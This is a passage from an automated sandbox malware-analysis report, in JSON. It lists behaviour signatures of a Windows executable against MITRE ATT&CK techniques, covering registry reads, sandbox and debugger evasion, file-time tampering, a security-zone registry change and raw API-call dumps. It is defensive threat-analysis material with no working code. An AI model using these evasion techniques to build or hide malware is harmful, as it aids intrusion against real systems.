\"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"531D6BD6C0207FFC145C714DA946BAE8A057BE3A3FC7001F5EA800EF8C61679C\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\MSIPV\"; Key: \"MAINVER\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to delay the execution of current thread", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"_.exe\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"_.exe\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"rundll32.exe\" called \"FindResourceA\" with parameter \"128\" - (UID: 00000000-00005856)\n \"rundll32.exe\" called \"FindResourceA\" with parameter \"102\" - (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"4476031772,5724,3024,,RtlGetVersion,NTDLL.dll,\"252:02:39.227\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00005736.00000000.65854.001C0000.00000004.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"4,,RtlGetVersion,NTDLL.dll,\"252:02:43.372\",Rt\" (Indicator: \"GetVersion\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"_.exe\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005736)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a00000042d1a57700000000984a3100406b2f00606c2f00909f340008702f0095e1ac779cf01200feffffffd4f1120095e1ac77423c0700feffffffff2bb0779a2ab077f8f1120000f3120020f21200340000c06cf11200e738b077ec38b0773ed1a577340000c020f2120000f31200 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec38b07742d1a57724f21200105eaf7758f11200e8f012001c5eaf7764f2120095e1ac7722380700feffffffec38b07761d6d475340000c05d0d017710f312006ed6d4758c0100004cf2120054f21200ff2bb07750f212000200000000000000000000008c0100002008350058f11200 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec38b07742d1a57724f21200105eaf7758f11200e8f012001c5eaf7764f2120095e1ac7722380700feffffffec38b07761d6d475340000c05d0d017710f312006ed6d4758c0100004cf2120054f21200ff2bb07750f212000200000000000000000000008c010000600c350058f11200 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n file/memory contains long string with (Indicator: \"sendmessage\"; File: \"_.exe\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetActiveWindow\" (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000001c00f0671f0000000000ea0100eb00000000206a1f00787c1f0040051f00500b000000001c0000800000f0671f003cf712000464b07738011c00e063b07744efa5770000000000001c0000001c00180a1f00000000000600000600000000580a1f0040051f00080d1f003000000000001c0000200000180a1f0088f712000464b07738011c00e063b077f0efa5770000000000001c00200a1f000000000003000000000000002f0200007f0700000000000040051f0050011c000000000000001c00 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00f0671f0000000000ea0100eb00000000206a1f00787c1f0040051f00500b000000001c0000800000f0671f003cf712000464b07738011c00e063b07744efa57700001c00180a1f00000000000600000600000000580a1f0040051f00080d1f003000000000001c0000200000180a1f0080f712000464b07738011c00e063b077f8efa5770000000000001c00200a1f002f020000000000000000000003000000000000002f020000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00707c1f00f83b0000ff07000000001c00000000007f070000c4001c00302f1c006e22000044f6120067e5ad7700001c00707c1f000000000000001c0000000000707c1f00000000002922000b00000000a07e1f00c4001c0040051f00003b000000001c0000000000707c1f003cf712000464b07738011c00e063b07744efa5770000000000001c00787c1f0000000000000000000000000000000000000000000000000000000000000000000000000000001c0050011c0000000000000000000000000000000000000000000000000000000000000000000000000003000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c006e22000044f6120067e5ad7700001c00707c1f000000000000001c0000000000707c1f00000000002922000b00000000a07e1f00c4001c0040051f00003b000000001c0000000000707c1f003cf712000464b07738011c00e063b07744efa5770000000000001c00787c1f0000000000000000000000000000000000000000000000000000000000000000000000000000001c0050011c00000000000000000000000000000000000000000000000000000000000000000000000000030000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000065786500000000000000e0211c001cf9120000000000c0f91200ebdbaf760000d075a0000000d0f91200dfc7b0774083b877bec7b077a8e1a577ebdbaf76a00000000000d0750000000000000000000000009cf91200000000007cfd120095e1ac77a81e0700feffffffbec7b077548eaa750000d075ffffffff08e04000a84e40000000d075a8e340000900000000000000ffffffff000000000000d075a00000002565d675280100000000000068160000000000000000000003000000580500000800000000000000353331643662643663303230376666633134356337313464 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00f83b0000ff07000000001c00000000007f070000c4001c00302f1c006e220000b0f9120067e5ad7700001c00707c1f000000000000001c0000000000707c1f00000000002922000b00000000a07e1f00c4001c0040051f00003b000000001c0000000000707c1f00a8fa12000464b07738011c00e063b077d0e2a5770000000000001c00787c1f0000000000000000000000000000000000000000000000000000000000000000000000000000001c0050011c000000000000000000000000000000000000000000000000000000000000000000000000000300000000000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00f83b0000ff07000000001c00000000007f070000c4001c00302f1c006e220000b0f9120067e5ad7700001c00707c1f000000000000001c0000000000707c1f00000000002922000b00000000a07e1f00c4001c0040051f00003b000000001c0000000000707c1f00a8fa12000464b07738011c00e063b077d0e2a5770000000000001c0000001c00180a1f00000000000500000500000000600a1f00f8771f00080d1f002800000000001c0000200000180a1f00f4fa12000464b07738011c00e063b0778ce2a5770000000000001c00200a1f00000000000300000000000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 